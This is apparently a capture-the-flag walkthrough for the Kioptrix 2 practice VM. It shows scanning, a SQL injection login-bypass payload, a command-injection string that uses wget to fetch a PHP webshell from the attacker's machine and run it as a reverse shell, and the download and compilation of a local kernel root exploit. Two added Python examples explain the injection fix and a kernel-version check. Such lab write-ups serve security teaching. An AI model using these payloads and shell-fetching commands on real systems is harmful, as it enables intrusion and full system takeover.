Overview
Kioptrix 2 is a boot-to-root (B2R) VM designed for students to practice vulnerability analysis and exploitation. The objective is to root the virtual machine by exploiting the available vulnerabilities, leading to full system compromise.
Lab Setup:
- VMWare workstation for Virtual Machines
- Kali Linux VM in Bridge mode
- Kioptrix in Bridge mode
Tools Used:
- Kali Linux VM
- netdiscover
- nmap
Vulnerabilities Exploited:
- SQL Injection
- Command Execution
- Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root
Reconnaissance/ Scanning
#netdiscover
Target VM IP Address: 192.168.8.105
nmap -p- -A --webxml -oX nmap-kioptrix2.xml 192.168.8.105
Nmap findings:
Found a website running on port 80.
Exploitation:
Found SQL injection in the website's login; the following input bypasses authentication:
admin' or 1=1 -- -
garbag
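To show why that input works and how the login should have been written, here is an added example (not code from the page or from the Kioptrix 2 application): a constructed in-memory SQLite user table with a login built by string concatenation, beside the parameterized form. Usernames and passwords in it are constructed sample values.

```python
import sqlite3

# Constructed sample credential store; not the Kioptrix 2 database.
USERS = [("admin", "constructed-pass-1"), ("bob", "constructed-pass-2")]


def make_db():
    """Build a throwaway in-memory database with the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The injectable pattern: user text is spliced into the SQL statement.

    With username  admin' or 1=1 -- -  the statement becomes
      ... WHERE username = 'admin' or 1=1 -- -' AND password = '...'
    The quote closes the literal, 1=1 makes the WHERE clause true for
    every row, and -- comments out the password check entirely.
    """
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Hardened form: placeholders keep the input as data, never as SQL syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or 1=1 -- -"
    print("vulnerable login:", login_vulnerable(db, payload, "garbag"))  # admin
    print("parameterized login:", login_safe(db, payload, "garbag"))     # None
```

The same payload logs in as the first user in the table against the concatenated query and is simply a non-matching username against the parameterized one, which is the whole fix: the database never sees the quote or the comment marker as syntax.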
Found command execution. Our goal is to upload a webshell. We need to find a utility that will download our webshell (wget, nc, etc.) and a writable directory.
127.0.0.1; pwd; ls -al; id; whereis wget
wget is available on the server. We can use wget to download the webshell onto the server, but we cannot write it to /var/www/html because that directory is owned by root and is not writable by everyone. No problem: /tmp is writable, so we download the webshell there with this command.
#127.0.0.1; wget 192.168.8.104/shell.txt -O /tmp/shell.php; php /tmp/shell.php
Before executing the above command, configure the webshell with the reverse-connection IP address of our Kali Linux machine and start the web server:
#service apache2 start
and also start the nc listener:
#nc -nvlp 1234
Execute the command.
Received an interactive shell.
Privilege Escalation
Let's check the operating system and kernel version, and see whether an exploit is available.
I don't know why each character is typed twice 😦
Searching Exploit-DB found an exploit for CentOS 4.5.
Move to the exploit directory and start the SimpleHTTPServer Python module:
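The exploit title listed at the top of this page gives an affected range, Linux 2.6 up to but not including 2.6.19. A defender doing the same version check from the other side wants to compare a kernel release string against that range without being tripped up by distribution suffixes. This is an added example, not code from the page: the range is taken from the exploit title, and the release strings in it are constructed samples in the usual `uname -r` format.

```python
import platform
import re

# Affected range from the exploit title on this page: 2.6 <= kernel < 2.6.19
AFFECTED_MIN = "2.6"
AFFECTED_MAX_EXCLUSIVE = "2.6.19"


def parse_kernel(release):
    """Turn a `uname -r` string such as '2.6.9-55.EL' into (2, 6, 9).

    Anything after the numeric major.minor.patch prefix (distro build
    numbers, '-generic', '.el5') is ignored; a missing patch level is 0.
    """
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(int(x) for x in m.groups(default="0"))


def in_affected_range(release, lo=AFFECTED_MIN, hi=AFFECTED_MAX_EXCLUSIVE):
    """True if the release falls inside [lo, hi), compared numerically."""
    return parse_kernel(lo) <= parse_kernel(release) < parse_kernel(hi)


def check_running_kernel():
    """Apply the check to the kernel this script is actually running on."""
    release = platform.release()
    return release, in_affected_range(release)


if __name__ == "__main__":
    # Constructed sample release strings, not output captured from the target.
    for sample in ["2.6.9-55.EL", "2.6.18-8.el5", "2.6.32-754.el6", "4.18.0-348.el8"]:
        print(sample, "->", "affected" if in_affected_range(sample) else "not affected")
    print("this host:", check_running_kernel())
```

Comparing tuples rather than strings matters here: as text, "2.6.9" sorts after "2.6.19", which is exactly the kind of mistake that makes a vulnerable host look patched.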
#cd /usr/share/exploitdb/exploits/linux_x86/local/
#python -m SimpleHTTPServer 8888
and on the target VM download the exploit code,
#wget http://192.168.8.104:8888/9542.c
#gcc 9542.c
#./a.out
Congrats! We are root!!!